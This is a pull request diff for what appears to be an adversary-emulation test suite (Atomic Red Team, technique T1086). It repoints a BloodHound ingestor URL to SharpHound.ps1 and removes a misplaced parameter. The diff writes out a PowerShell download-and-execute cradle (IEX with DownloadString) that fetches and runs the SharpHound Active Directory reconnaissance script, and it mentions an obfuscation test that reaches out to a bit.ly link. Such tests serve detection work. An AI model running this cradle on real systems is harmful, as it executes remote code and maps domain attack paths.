### PR TITLE
BloodHound URLs - T1086

### DIFF
--- a/atomics/T1086/T1086.md
+++ b/atomics/T1086/T1086.md
@@ -62,11 +62,11 @@ Download Bloodhound and run it
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
+| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1|
 
 #### Run it with `command_prompt`!
 ```
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
 ```
 <br/>
 <br/>
@@ -77,11 +77,6 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR
 
 **Supported Platforms:** Windows
 
-
-#### Inputs
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1|
 
 #### Run it with `powershell`!
 ```

--- a/atomics/T1086/T1086.yaml
+++ b/atomics/T1086/T1086.yaml
@@ -32,12 +32,12 @@ atomic_tests:
     bloodurl:
       description: BloodHound URL
       type: url
-      default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
+      default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
 
   executor:
     name: command_prompt
     command: |
-      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Get-BloodHoundData"
+      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound"
 
 - name: Obfuscation Tests
   description: |
@@ -46,13 +46,7 @@ atomic_tests:
 
   supported_platforms:
     - windows
-
-  input_arguments:
-    bloodurl:
-      description: BloodHound URL
-      type: url
-      default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
-
+    
   executor:
     name: powershell
     command: |

--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -15471,11 +15471,11 @@ execution:
         bloodurl:
           description: BloodHound URL
           type: url
-          default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
+          default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1
       executor:
         name: command_prompt
         command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{bloodurl}'');
-          Get-BloodHoundData"
+          Invoke-BloodHound"
 
 '
     - name: Obfuscation Tests
@@ -15484,11 +15484,6 @@ execution:
         Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION"
       supported_platforms:
       - windows
-      input_arguments:
-        bloodurl:
-          description: BloodHound URL
-          type: url
-          default: https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1
       executor:
         name: powershell
         command: |


### PR DESCRIPTION
Modified the URL to point to sharphound. 
The second url was a misplaced parameter. Removed.

Fixes issue #465 